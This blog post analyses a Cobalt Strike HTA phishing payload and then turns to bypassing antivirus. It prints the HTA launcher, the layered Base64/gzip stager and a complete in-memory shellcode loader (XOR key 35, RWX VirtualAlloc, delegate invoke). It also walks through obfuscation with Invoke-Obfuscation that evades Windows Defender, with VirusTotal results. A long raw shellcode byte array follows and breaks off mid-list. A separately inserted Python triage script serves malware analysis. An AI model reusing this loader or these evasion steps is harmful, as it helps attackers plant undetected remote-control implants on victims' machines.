Analyzing a Cobalt Strike-generated HTA and PowerShell AV evasion

Looking back at the write-ups I did when I was just starting out, I realized I have never properly written a blog post. Recently I met a group of friends and saw their blogs, so I decided to start recording some content of real quality.

HTA file analysis

HTA files are a delivery method commonly used in Cobalt Strike phishing, but I had never looked at what is inside one. Today, on a whim, I decided to see what it actually contains, and which part of it antivirus software scans and flags.

<script language="VBScript">
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell -nop -w hidden -encodedcommand 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", 0, true
End Function

var_func
self.close
</script>

First, the HTA source. It is written in VBScript, a lightweight interpreted language for Microsoft environments that is also the default language of ASP dynamic pages, but that is not the point here. What interests us most is the long Base64-encoded string passed in the shell command, so let's decode it and see what it is.

Base64 decoding

After decoding, this is what comes out (the -encodedcommand value is Base64 of UTF-16LE text, so a byte-wise decode shows a null byte after every character, which is what appears as a dot). Replacing the dots gives this code:

$s=New-Object IOMemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IOStreamReader(New-Object IOCompressionGzipStream($s,[IOCompressionCompressionMode]::Decompress)))ReadToEnd();

I first tried Base64-decoding the long string in the middle on its own, but the result is just garbage, unfortunately (the H4sI prefix shows it is gzip data, not text).
So let's look at the rest instead.
A few calls in there are worth attention:

IO.MemoryStream(,[Convert]::FromBase64String(...)) decodes the Base64 string into bytes and wraps them in a memory stream
IO.Compression.GzipStream(..., Decompress) gunzips that stream as it is read
Finally Invoke-Expression (IEX, which runs a Windows PowerShell expression supplied as a string) executes the resulting text as a command

There is a ready-made script online, so we just run it (link to the original script).

$data = [System.Convert]::FromBase64String('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')
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)   # load the Base64-decoded bytes into a memory stream
$ms.Seek(0,0) | Out-Null            # rewind to the start before reading
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))   # gunzip on read
$sr.ReadToEnd() | Set-Clipboard     # the decompressed script text lands in the clipboard

The script first Base64-decodes the data and then gunzips it, which recovers the PowerShell source the HTA launches.

Here I made a silly mistake: in the earlier Base64-decoded output I replaced all the extra dots, which also removed the dots that were genuinely part of the code. The correct code should look like this:
I had actually thought of this problem at the time, but somehow didn't pay attention to it, which is odd.

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The result is saved to the clipboard automatically.
This gives the decompressed source:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)

$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}

Testing each section of the code separately with Windows Defender shows that the detection fires on $var_code.
I tried decoding $var_code further (locally the Base64 decodes to garbage for me, which is odd).
According to other people's results you get a string of ASCII characters; decoding that gives mostly garbage, but at the very end the attacker's IP can be found. There is not much other information to extract.

In summary, the PowerShell check-in works by XOR-decoding $var_code with key 35, allocating memory with VirtualAlloc (0x3000 is MEM_COMMIT|MEM_RESERVE, 0x40 is PAGE_EXECUTE_READWRITE), copying the bytes in with Marshal.Copy and invoking them through a delegate; the Cobalt Strike shellcode itself is stored in the $var_code variable.
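The three envelope layers walked through above (UTF-16LE Base64 for -encodedcommand, Base64 plus gzip for the $s stream, Base64 plus -bxor 35 for $var_code) can be peeled programmatically instead of by hand. The following Python triage script is an added example written for this page, not code from the original post or from Cobalt Strike: it reads the same layout the post decoded manually and reports what a responder wants from a stager (the XOR key, printable strings, IPv4 addresses). The input it runs on is a constructed fixture that wraps dummy bytes in the same envelope, not real shellcode, and the regexes assume the variable layout of the stager shown above.

```python
import base64
import gzip
import re

# Envelope patterns taken from the stager layout shown on this page.
B64_BLOB = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
XOR_KEY = re.compile(r"-bxor\s+(\d+)")
IPV4 = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_encoded_command(b64: str) -> str:
    """Layer 1: -encodedcommand carries Base64 of UTF-16LE script text.
    The null byte after every character is what showed up as dots above."""
    return base64.b64decode(b64).decode("utf-16-le")


def gunzip_b64(b64: str) -> str:
    """Layer 2: the IO.MemoryStream + GzipStream(Decompress) wrapper."""
    return gzip.decompress(base64.b64decode(b64)).decode("utf-8", errors="replace")


def xor_key_of(stager: str) -> int:
    """Read the key from the 'for ... -bxor N' loop (35 in the stager above)."""
    m = XOR_KEY.search(stager)
    return int(m.group(1)) if m else 0


def extract_var_code(stager: str) -> bytes:
    """Layer 3: pull the $var_code blob and undo the XOR loop."""
    blob = B64_BLOB.search(stager)
    if blob is None:
        raise ValueError("no FromBase64String blob in stager")
    key = xor_key_of(stager)
    return bytes(b ^ key for b in base64.b64decode(blob.group(1)))


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Cheap 'strings' pass: runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(encoded_command: str) -> dict:
    """Peel all three layers and report what a responder wants from the stager."""
    layer1 = decode_encoded_command(encoded_command)
    inner = B64_BLOB.search(layer1)
    if inner is None:
        raise ValueError("layer 1 carries no Base64 blob")
    stager = gunzip_b64(inner.group(1))
    shellcode = extract_var_code(stager)
    return {
        "xor_key": xor_key_of(stager),
        "shellcode_len": len(shellcode),
        "strings": printable_strings(shellcode),
        "ips": sorted({m.decode("ascii") for m in IPV4.findall(shellcode)}),
    }


# --- constructed fixture: dummy bytes in the same envelope, NOT real shellcode ---
FAKE_PAYLOAD = (b"\x90" * 16
                + b"User-Agent: Mozilla/5.0 (constructed sample)\x00"
                + b"203.0.113.10\x00/constructed/stage\x00")


def build_constructed_sample(key: int = 35) -> str:
    """Wrap FAKE_PAYLOAD the way the page's HTA wraps its stager (test input only)."""
    xored = bytes(b ^ key for b in FAKE_PAYLOAD)
    stager = (
        "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
        "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor %d }\n"
        % (base64.b64encode(xored).decode("ascii"), key)
    )
    gz_b64 = base64.b64encode(gzip.compress(stager.encode("utf-8"))).decode("ascii")
    layer1 = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
              'IEX (New-Object IO.StreamReader(...)).ReadToEnd();' % gz_b64)
    return base64.b64encode(layer1.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    report = triage(build_constructed_sample())
    print("xor key:", report["xor_key"], "| bytes:", report["shellcode_len"])
    print("ips:", report["ips"])
    for s in report["strings"]:
        print("  str:", s)
```

On a real sample, paste the value that follows -encodedcommand in the HTA into triage(); the XOR step is what turns the "garbage" the post saw when decoding $var_code directly into something strings and the IP regex can read.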

PowerShell AV evasion

Using a tool

From the analysis of the HTA above we know that Windows Defender flags $var_code, so what we need to do is obfuscate that part to get past Windows Defender's detection.
First, an open-source obfuscation tool worth recommending: Invoke-Obfuscation.

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Install and run it following its instructions.

What a cool interface.

Since I didn't study the tool's usage in detail, I just used another author's configuration:
Set scriptblock 'final_base64payload' followed by COMPRESS 1. This configuration gets past Windows Defender (other obfuscation options can be chosen to get past different AV engines); the tool then outputs a PowerShell command built according to that configuration.

Out d:payload.ps1 writes it out,
giving payload.ps1.
Replacing the content of $var_code with the newly generated payload, Windows Defender is bypassed successfully.

Next we upload it to VirusTotal to see how it does.


Although it gets past some of the big vendors' engines, for example Microsoft, Tencent and McAfee,
16/59 still doesn't feel good enough, so next let's try manual evasion.

Manual evasion

We generate a PowerShell payload directly from Cobalt Strike; reusing the one embedded in the HTA would mean dealing with several layers of Base64 and compression, which is too much hassle.
Let's look at the source first.

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)

$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}

As before, the part we need to obfuscate is still $var_code.
The idea is to get rid of the Base64 encoding, since the Base64 form is what gets flagged, and use a byte array instead.

Maybe this is the legendary FromBase65String?
Change $var_code to:

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,83,142,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,87,75,26,100,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,110,98,112,97,10,46,41,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,1
